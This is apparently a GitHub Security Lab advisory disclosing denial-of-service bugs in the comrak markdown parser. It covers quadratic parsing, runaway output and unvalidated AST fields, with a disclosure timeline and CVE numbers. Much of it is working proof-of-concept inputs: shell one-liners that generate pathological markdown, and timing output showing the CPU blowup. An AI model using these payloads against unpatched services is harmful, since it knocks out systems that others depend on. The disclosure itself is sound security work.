Coordinated Disclosure Timeline

  • 2023-03-22: Issues reported to maintainer and acknowledged
  • 2023-03-23: Patches proposed by maintainer
  • 2023-03-27: Fixes merged

Summary

A number of quadratic parsing issues can allow an attacker to trigger a denial-of-service via excessive CPU usage or excessive memory usage.

In addition, an architectural design decision in the AST module could allow attackers to trigger a denial-of-service in applications building ASTs programmatically.

Product

comrak

Tested Version

Details

Issue 1: Quadratic runtime when parsing markdown (GHSL-2023-047)

There are a number of parsing issues in comrak where the runtime increases quadratically compared to the input size. This can allow an attacker to trigger excessive CPU usage and cause a denial of service. comrak is heavily based on the github/cmark-gfm project, so a number of quadratic parsing issues are similar to upstream cmark or cmark-gfm issues.

In our research we looked at previously submitted bug reports to cmark or cmark-gfm, the cmark-gfm suite of regression tests, and a custom fuzzer we created for comrak.

Known cmark or cmark-gfm vulnerabilities

The cmark issue, “Pathological input: Deeply nested lists”, can be reproduced in comrak:

$ for n in $(echo 100 200 400 800 1600); do echo -n "${n}: "; ./a.out "${n}" | time ./target/release/comrak --extension table >/dev/null; done
100:         0.07 real         0.04 user         0.00 sys
200:         0.15 real         0.13 user         0.00 sys
400:         0.63 real         0.60 user         0.01 sys
800:         3.77 real         3.72 user         0.03 sys
1600:        27.64 real        27.32 user         0.14 sys

A number of other cmark or cmark-gfm quadratic parsing issues affect comrak too.

  • Quadratic behavior when parsing emphasis

    • $ for n in 5000 10000 20000 40000 80000; do echo -n "${n} "; python3 -c "print('*t '*$n+'_t*_ '*$n)" |time ./target/release/comrak >/dev/null; done
      5000         0.08 real         0.05 user         0.00 sys
      10000         0.16 real         0.14 user         0.00 sys
      20000         0.51 real         0.48 user         0.01 sys
      40000         1.95 real         1.89 user         0.02 sys
      80000         8.30 real         8.13 user         0.07 sys
      
  • Quadratic behavior when parsing inlines

    • $ for n in $(echo 5000 10000 20000 40000); do echo -n "${n}: "; python3 -c "print('- '*${n}+'s'+' -'*${n})" | time ./target/release/comrak --smart >/dev/null; done
      5000:         0.60 real         0.47 user         0.11 sys
      10000:         2.00 real         1.75 user         0.21 sys
      20000:         7.54 real         7.01 user         0.43 sys
      40000:        31.65 real        30.37 user         0.94 sys
      
  • Quadratic behaviour on pathological html

    • $ for n in $(echo 5000 10000 20000); do echo -n "${n}: "; python3 -c "print('a <\x21[CDATA[' * ${n})" | time ./target/release/comrak >/dev/null; done
      5000:         2.24 real         2.17 user         0.01 sys
      10000:         8.54 real         8.40 user         0.03 sys
      20000:        36.56 real        35.82 user         0.16 sys
      
  • Quadratic behavior when parsing smart quotes

    • $ for n in $(echo 5000 10000 20000 40000 80000 160000); do echo -n "${n}: "; python3 -c "print(\"'\"*$n)" |time ./target/release/comrak --smart >/dev/null; done
      5000:         0.06 real         0.04 user         0.00 sys
      10000:         0.12 real         0.10 user         0.00 sys
      20000:         0.46 real         0.44 user         0.00 sys
      40000:         1.85 real         1.82 user         0.00 sys
      80000:         7.34 real         7.24 user         0.03 sys
      160000:        31.24 real        30.91 user         0.12 sys
      
  • Parsing ‘* * * * * * … a’ takes quadratic time

    • $ for n in $(echo 10000 20000 40000); do echo -n "${n}: "; python3 -c "print('* '*${n} + 'a')" | time ./target/release/comrak >/dev/null; done
      10000:         1.26 real         1.02 user         0.21 sys
      20000:         4.50 real         3.99 user         0.42 sys
      40000:        19.08 real        17.97 user         0.89 sys
      
  • Pathological input: Unclosed inline links (another)

    • $ for n in $(echo 5000 10000 20000 40000); do echo -n "${n}: "; python3 -c "print('[a](<b' * ${n})" | time ./target/release/comrak >/dev/null; done
      5000:         0.62 real         0.59 user         0.00 sys
      10000:         2.31 real         2.25 user         0.01 sys
      20000:         8.95 real         8.81 user         0.04 sys
      40000:        35.96 real        35.42 user         0.13 sys
      
  • blocks: Fix quadratic behavior in finalize

    • $ for n in $(echo 5000 10000 20000 40000 80000); do echo -n "${n}: "; python3 -c "print('[a]: u\n' * ${n})" | time ./target/release/comrak >/dev/null; done
      5000:         0.14 real         0.12 user         0.00 sys
      10000:         0.38 real         0.37 user         0.00 sys
      20000:         1.41 real         1.38 user         0.00 sys
      40000:         5.52 real         5.46 user         0.01 sys
      80000:        24.90 real        24.47 user         0.10 sys
      

cmark-gfm regression tests

In addition, there are two testcases from the cmark-gfm testsuite which trigger quadratic parsing behaviour:

  • pattern [ (]( repeated
    • $ for n in $(echo 10000 20000 40000); do echo -n "${n}: "; python3 -c "print('[ (](' * ${n})" | time ./target/release/comrak >/dev/null; done
      10000:         1.37 real         1.34 user         0.00 sys
      20000:         5.13 real         5.10 user         0.01 sys
      40000:        21.00 real        20.91 user         0.03 sys
      
  • unclosed links A
    • $ for n in $(echo 10000 20000 40000); do echo -n "${n}: "; python3 -c "print('[a](<b' * ${n})" | time ./target/release/comrak >/dev/null; done
      10000:         2.27 real         2.21 user         0.01 sys
      20000:         8.89 real         8.77 user         0.04 sys
      40000:        36.77 real        36.18 user         0.16 sys
      

Fuzz testing

The following testcases show a number of quadratic parsing issues we discovered via fuzzing that appear to be specific to comrak:

  • "\n|-\n^\" * N

    • $ for n in $(echo 250 500 1000 2000 4000); do echo -n "${n}: "; python3 -c "print(\"\n|-\n^\"*$n)" | time ./target/release/comrak --gfm >/dev/null; done
      250:         0.14 real         0.12 user         0.00 sys
      500:         0.52 real         0.50 user         0.01 sys
      1000:         2.73 real         2.70 user         0.01 sys
      2000:        17.05 real        16.99 user         0.04 sys
      4000:       125.65 real       125.11 user         0.22 sys
      
  • " |A\n---: |\n| A | A" * N

    • $ for n in $(echo 250 500 1000 2000 4000); do echo -n "${n}: "; python3 -c "print(\"      |A\n---: |\n| A   | A\"*$n)" | time ./target/release/comrak --gfm >/dev/null; done
      250:         0.21 real         0.19 user         0.00 sys
      500:         0.96 real         0.93 user         0.01 sys
      1000:         5.78 real         5.72 user         0.03 sys
      2000:        40.92 real        40.63 user         0.16 sys
      4000: ^Ctime: command terminated abnormally
            210.26 real       208.68 user         0.74 sys
      
  • "<b" * N

    • $ for n in $(echo 2500 5000 10000 20000 40000 80000 160000); do echo -n "${n}: "; python3 -c "print(\"<b\"*$n)" | time ./target/release/comrak --gfm >/dev/null; done
      2500:         0.13 real         0.07 user         0.04 sys
      5000:         0.28 real         0.18 user         0.08 sys
      10000:         0.80 real         0.61 user         0.17 sys
      20000:         2.66 real         2.30 user         0.33 sys
      40000:         9.97 real         9.20 user         0.72 sys
      80000:        38.00 real        36.28 user         1.55 sys
      160000:       147.16 real       143.76 user         2.95 sys
      
  • "[](" * N

    • $ for n in $(echo 2500 5000 10000 20000 40000 80000 160000); do echo -n "${n}: "; python3 -c "print(\"[](\"*$n)" | time ./target/release/comrak --gfm >/dev/null; done
      2500:         0.14 real         0.06 user         0.06 sys
      5000:         0.26 real         0.12 user         0.12 sys
      10000:         0.65 real         0.36 user         0.26 sys
      20000:         1.78 real         1.24 user         0.50 sys
      40000:         5.88 real         4.78 user         1.01 sys
      80000:        21.10 real        18.69 user         2.14 sys
      160000:        80.39 real        74.52 user         4.94 sys
      
  • "r@o.c" * N

    • $ for n in $(echo 2500 5000 10000 20000 40000 80000 160000); do echo -n "${n}: "; python3 -c "print(\"r@o.c\"*$n)" | time ./target/release/comrak --gfm >/dev/null; done
      2500:         0.21 real         0.07 user         0.12 sys
      5000:         0.36 real         0.13 user         0.21 sys
      10000:         0.81 real         0.34 user         0.44 sys
      20000:         2.03 real         1.16 user         0.83 sys
      40000:         5.94 real         4.16 user         1.66 sys
      80000:        19.59 real        15.93 user         3.43 sys
      160000:        73.22 real        65.63 user         7.08 sys
      

Issue 2: Excessive output when parsing markdown (GHSL-2023-048)

comrak is vulnerable to the upstream cmark issue, “Issue revealed by fuzzer”. A large number of references in a markdown document can trigger an overly large response. For example, this markdown ~40KB document generates a ~900MB HTML output:

$ python3 -c 'print("[1] "*5000,"\n\n[1]: urn:","\x00"*20000,"\n", sep="")' | wc -c
   40013
$ python3 -c 'print("[1] "*5000,"\n\n[1]: urn:","\x00"*20000,"\n", sep="")' | ./target/release/comrak |wc -c
 900105007

This issue could trigger a denial-of-service be triggering excessive memory usage or generating an overly large output.

Issue 3: Attacker controlled data in AST nodes is not validated (GHSL-2023-049)

A comrak AST can be constructed manually by a program instead of parsing a markdown document with parse_document. This AST can then be converted to HTML via html::format_document_with_plugins. However, the HTML formatting code assumes that the AST is well-formed. For example, many AST notes contain [u8] fields which the formatting code assumes is valid UTF-8 data. Several bugs can be triggered if this is not the case. For example:

  • The literal member of NodeHtmlBlock is not validated when formatting an AST to HTML. The literal value is processed by the tagfilter function which uses the unsafe String::from_utf8_unchecked). If the value is attacker controlled then it can cause an out of bounds read (up to two bytes if literal ends with 0xe2).
  • The literal member of NodeHtmlBlock is not validated when formatting an AST to HTML. The literal value is processed by the tagfilter function which assumes that it contains well-formed HTML. If literal contains a truncated HTML tag (e.g. <title) then a panic can be triggered which crashes the program when indexing literal[j].
  • The FootnoteReference structure is not validated when formatting an AST to HTML. The byte buffer is assumed to be UTF-8 encoded in format_node. The unwrap() call will panic if this is not the case.
  • The info member of NodeCodeBlock is not validated when formatting an AST to HTML. The byte buffer is assumed to be UTF-8 encoded in format_node. The unwrap() call will panic if this is not the case.

Depending on how the comrak library is used by applications, this could allow attackers to trigger an assertion failure causing a denial-of-service if input is not correctly sanitized.

CVE

  • CVE-2023-28626 - GHSL-2023-047
  • CVE-2023-28631 - GHSL-2023-049

Credit

GHSL-2023-047 and GHSL-2023-048 were discovered and reported by GHSL team member @philipturnbull (Phil Turnbull).

GHSL-2023-049 was discovered and reported by GHSL team member @darakian (Jonathan Moroney).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-047, GHSL-2023-048, or GHSL-2023-049 in any communication regarding these issues.